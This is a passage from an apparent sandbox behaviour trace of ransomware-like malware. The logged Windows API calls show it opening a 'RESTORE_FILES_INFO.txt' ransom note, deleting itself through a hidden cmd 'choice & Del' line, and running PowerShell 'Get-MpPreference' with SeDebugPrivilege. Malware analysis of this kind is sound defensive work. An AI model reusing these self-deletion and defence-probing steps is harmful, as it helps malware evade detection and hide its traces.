SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 1400 os_tid = 0x134c Thread: id = 1401 os_tid = 0xdbc Thread: id = 1403 os_tid = 0x11b8 Thread: id = 1404 os_tid = 0xea4 [0252.624] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0252.625] CoGetContextToken (in: pToken=0x5a3ee34 | out: pToken=0x5a3ee34) returned 0x0 [0252.625] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a3ee58 | out: ppvObject=0x5a3ee58*=0x6ded34) returned 0x0 [0252.625] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5a3ee84 | out: pThreadType=0x5a3ee84*=0) returned 0x0 [0252.625] IUnknown:Release (This=0x6ded34) returned 0x1 [0252.625] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0252.625] CoUninitialize () [0252.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.795] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.906] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.123] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.592] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.623] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 1406 os_tid = 0x13fc [0256.336] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0256.337] ShellExecuteExW (in: pExecInfo=0x6ddb60c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="notepad.exe", lpParameters="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x6ddb60c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="notepad.exe", lpParameters="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x174)) returned 1 [0256.442] CoGetContextToken (in: pToken=0x55ff270 | out: pToken=0x55ff270) returned 0x0 [0256.443] CoUninitialize () Thread: id = 1409 os_tid = 0x3c4 [0257.082] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0257.092] ShellExecuteExW (in: pExecInfo=0x6ddfc90*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="\"/C choice /C Y /N /D Y /T 3 & Del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x6ddfc90*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="\"/C choice /C Y /N /D Y /T 3 & Del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x5b8)) returned 1 [0257.152] CoGetContextToken (in: pToken=0x7eff010 | out: pToken=0x7eff010) returned 0x0 [0257.152] CoUninitialize () Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 13 os_tid = 0x410 Thread: id = 14 os_tid = 0x414 Thread: id = 15 os_tid = 0x5d8 Thread: id = 16 os_tid = 0x320 Thread: id = 17 os_tid = 0x6cc Thread: id = 18 os_tid = 0x42c Thread: id = 19 os_tid = 0x1e4 Thread: id = 20 os_tid = 0x760 Thread: id = 21 os_tid = 0x75c Thread: id = 22 os_tid = 0x74c Thread: id = 23 os_tid = 0x710 Thread: id = 24 os_tid = 0x6e8 Thread: id = 25 os_tid = 0x6e0 Thread: id = 26 os_tid = 0x6d0 Thread: id = 27 os_tid = 0x6bc Thread: id = 28 os_tid = 0x6b8 Thread: id = 29 os_tid = 0x6b0 Thread: id = 30 os_tid = 0x6a8 Thread: id = 31 os_tid = 0x69c Thread: id = 32 os_tid = 0x698 Thread: id = 33 os_tid = 0x684 Thread: id = 34 os_tid = 0x678 Thread: id = 35 os_tid = 0x4a8 Thread: id = 36 os_tid = 0x46c Thread: id = 37 os_tid = 0x44c Thread: id = 38 os_tid = 0x424 Thread: id = 39 os_tid = 0x420 Thread: id = 40 os_tid = 0x41c Thread: id = 41 os_tid = 0x404 Thread: id = 42 os_tid = 0x14c Thread: id = 43 os_tid = 0x158 Thread: id = 44 os_tid = 0x3fc Thread: id = 45 os_tid = 0x3f4 Thread: id = 46 os_tid = 0x3e8 Thread: id = 47 os_tid = 0x39c Thread: id = 48 os_tid = 0x390 Thread: id = 49 os_tid = 0x38c Thread: id = 50 os_tid = 0x388 Thread: id = 51 os_tid = 0x37c Thread: id = 52 os_tid = 0x374 Thread: id = 53 os_tid = 0x418 Thread: id = 54 os_tid = 0x3d4 Thread: id = 55 os_tid = 0x7ec Thread: id = 56 os_tid = 0x7ac Thread: id = 57 os_tid = 0x7e4 Thread: id = 58 os_tid = 0x35c Thread: id = 61 os_tid = 0x490 Thread: id = 62 os_tid = 0x700 Thread: id = 63 os_tid = 0x2a8 Thread: id = 64 os_tid = 0x738 Thread: id = 65 os_tid = 0x600 Thread: id = 67 os_tid = 0x31c Thread: id = 68 os_tid = 0x304 Thread: id = 69 os_tid = 0x804 Thread: id = 137 os_tid = 0xc90 Thread: id = 138 os_tid = 0xc94 Thread: id = 139 os_tid = 0xc98 Thread: id = 925 os_tid = 0xd5c Thread: id = 928 os_tid = 0x7ac Thread: id = 929 os_tid = 0xc68 Thread: id = 935 os_tid = 0xc38 Thread: id = 936 os_tid = 0xfac Thread: id = 937 os_tid = 0xa34 Thread: id = 938 os_tid = 0xc18 Thread: id = 978 os_tid = 0x13f4 Thread: id = 1108 os_tid = 0x1004 Thread: id = 1109 os_tid = 0x131c Thread: id = 1110 os_tid = 0x1278 Thread: id = 1117 os_tid = 0x2dc Thread: id = 1118 os_tid = 0x738 Thread: id = 1119 os_tid = 0x824 Thread: id = 1120 os_tid = 0x790 Thread: id = 1121 os_tid = 0xeac Thread: id = 1122 os_tid = 0xce4 Thread: id = 1123 os_tid = 0xe74 Thread: id = 1124 os_tid = 0xc6c Thread: id = 1125 os_tid = 0x11e4 Thread: id = 1126 os_tid = 0xcf0 Thread: id = 1127 os_tid = 0xf64 Thread: id = 1128 os_tid = 0x1224 Thread: id = 1129 os_tid = 0x954 Thread: id = 1130 os_tid = 0x111c Thread: id = 1131 os_tid = 0x10c8 Thread: id = 1132 os_tid = 0xf40 Thread: id = 1133 os_tid = 0xc98 Thread: id = 1160 os_tid = 0xf50 Thread: id = 1162 os_tid = 0x73c Thread: id = 1165 os_tid = 0x5c8 Thread: id = 1166 os_tid = 0x9f4 Thread: id = 1170 os_tid = 0xab4 Thread: id = 1173 os_tid = 0x1040 Thread: id = 1175 os_tid = 0x5e8 Thread: id = 1177 os_tid = 0xbb4 Thread: id = 1179 os_tid = 0x708 Thread: id = 1181 os_tid = 0x1044 Thread: id = 1183 os_tid = 0xd44 Thread: id = 1185 os_tid = 0x1248 Thread: id = 1187 os_tid = 0xfd8 Thread: id = 1189 os_tid = 0x5c0 Thread: id = 1192 os_tid = 0x12d4 Thread: id = 1248 os_tid = 0x5b8 Thread: id = 1249 os_tid = 0x13e8 Thread: id = 1250 os_tid = 0x524 Thread: id = 1251 os_tid = 0xb64 Thread: id = 1252 os_tid = 0xac8 Thread: id = 1253 os_tid = 0xb84 Thread: id = 1254 os_tid = 0x5e4 Thread: id = 1255 os_tid = 0xc4 Thread: id = 1256 os_tid = 0x1308 Thread: id = 1257 os_tid = 0x12e8 Thread: id = 1258 os_tid = 0x10f0 Thread: id = 1259 os_tid = 0xc0c Thread: id = 1260 os_tid = 0xdb0 Thread: id = 1261 os_tid = 0x710 Thread: id = 1262 os_tid = 0x102c Thread: id = 1263 os_tid = 0xb88 Thread: id = 1264 os_tid = 0x13ac Thread: id = 1265 os_tid = 0xfdc Thread: id = 1266 os_tid = 0x1240 Thread: id = 1267 os_tid = 0x5e0 Thread: id = 1268 os_tid = 0xe2c Thread: id = 1269 os_tid = 0x12f4 Thread: id = 1280 os_tid = 0x10c0 Thread: id = 1326 os_tid = 0x11e0 Thread: id = 1327 os_tid = 0x1218 Thread: id = 1328 os_tid = 0x570 Thread: id = 1349 os_tid = 0x150 Thread: id = 1350 os_tid = 0xb40 Thread: id = 1364 os_tid = 0xeec Thread: id = 1385 os_tid = 0x1214 Thread: id = 1386 os_tid = 0x944 Thread: id = 1387 os_tid = 0xe90 Thread: id = 1388 os_tid = 0x748 Thread: id = 1389 os_tid = 0xfe4 Thread: id = 1390 os_tid = 0xb68 Thread: id = 1391 os_tid = 0x1184 Thread: id = 1392 os_tid = 0xf80 Thread: id = 1393 os_tid = 0xcd4 Process: id = "4" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x2f468000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"powershell\" Get-MpPreference -verbose" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0x644 [0069.467] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0070.661] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0070.661] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0070.662] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0070.662] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0071.530] GetVersionExW (in: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.530] GetLastError () returned 0x2 [0071.531] GetVersionExW (in: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.531] GetLastError () returned 0x2 [0071.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae26c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.540] GetLastError () returned 0x2 [0071.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae288, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.549] GetLastError () returned 0x2 [0071.549] GetVersionExW (in: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.549] GetLastError () returned 0x2 [0071.551] SetErrorMode (uMode=0x1) returned 0x1 [0071.552] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xae708 | out: lpFileInformation=0xae708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0071.553] GetLastError () returned 0x2 [0071.553] SetErrorMode (uMode=0x1) returned 0x1 [0071.557] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xae78c | out: lpdwHandle=0xae78c) returned 0x94c [0071.559] GetLastError () returned 0x0 [0071.561] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a44d48 | out: lpData=0x2a44d48) returned 1 [0071.564] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xae758, puLen=0xae754 | out: lplpBuffer=0xae758*=0x2a44de4, puLen=0xae754) returned 1 [0071.567] lstrlenW (lpString="䅁") returned 1 [0071.580] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a44ec0, puLen=0xae6d0) returned 1 [0071.580] lstrlenW (lpString="Microsoft Corporation") returned 21 [0071.582] lstrcpyW (in: lpString1=0x54b630, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0071.582] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a44f14, puLen=0xae6d0) returned 1 [0071.582] lstrlenW (lpString="System.Management.Automation") returned 28 [0071.582] lstrcpyW (in: lpString1=0x54b630, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0071.582] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a44f70, puLen=0xae6d0) returned 1 [0071.582] lstrlenW (lpString="6.1.7601.17514") returned 14 [0071.582] lstrcpyW (in: lpString1=0x54b630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0071.583] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a44fb0, puLen=0xae6d0) returned 1 [0071.583] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0071.583] lstrcpyW (in: lpString1=0x54b630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0071.583] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a45018, puLen=0xae6d0) returned 1 [0071.583] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0071.583] lstrcpyW (in: lpString1=0x54b630, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0071.583] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a450b4, puLen=0xae6d0) returned 1 [0071.583] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0071.583] lstrcpyW (in: lpString1=0x54b630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0071.583] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a45118, puLen=0xae6d0) returned 1 [0071.583] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0071.583] lstrcpyW (in: lpString1=0x54b630, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0071.583] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a45194, puLen=0xae6d0) returned 1 [0071.583] lstrlenW (lpString="6.1.7601.17514") returned 14 [0071.583] lstrcpyW (in: lpString1=0x54b630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0071.584] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x2a44e3c, puLen=0xae6d0) returned 1 [0071.584] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0071.584] lstrcpyW (in: lpString1=0x54b630, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0071.584] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x0, puLen=0xae6d0) returned 0 [0071.584] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x0, puLen=0xae6d0) returned 0 [0071.584] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xae6d4, puLen=0xae6d0 | out: lplpBuffer=0xae6d4*=0x0, puLen=0xae6d0) returned 0 [0071.584] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xae6c8, puLen=0xae6c4 | out: lplpBuffer=0xae6c8*=0x2a44de4, puLen=0xae6c4) returned 1 [0071.586] VerLanguageNameW (in: wLang=0x0, szLang=0x54b630, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0071.590] VerQueryValueW (in: pBlock=0x2a44d48, lpSubBlock="\\", lplpBuffer=0xae6dc, puLen=0xae6d8 | out: lplpBuffer=0xae6dc*=0x2a44d70, puLen=0xae6d8) returned 1 [0071.604] GetCurrentProcessId () returned 0x688 [0071.633] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xadf14 | out: lpLuid=0xadf14*(LowPart=0x14, HighPart=0)) returned 1 [0071.636] GetLastError () returned 0x0 [0071.638] GetCurrentProcess () returned 0xffffffff [0071.638] GetLastError () returned 0x0 [0071.640] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xadf10 | out: TokenHandle=0xadf10*=0x310) returned 1 [0071.641] GetLastError () returned 0x0 [0071.644] AdjustTokenPrivileges (in: TokenHandle=0x310, DisableAllPrivileges=0, NewState=0x2a47888*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0071.644] GetLastError () returned 0x0 [0071.646] CloseHandle (hObject=0x310) returned 1 [0071.646] GetLastError () returned 0x0 [0071.652] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x688) returned 0x310 [0071.652] GetLastError () returned 0x0 [0071.668] EnumProcessModules (in: hProcess=0x310, lphModule=0x2a478cc, cb=0x100, lpcbNeeded=0xae704 | out: lphModule=0x2a478cc, lpcbNeeded=0xae704) returned 1 [0071.669] GetLastError () returned 0x0 [0071.673] GetModuleInformation (in: hProcess=0x310, hModule=0x226b0000, lpmodinfo=0x2a47a0c, cb=0xc | out: 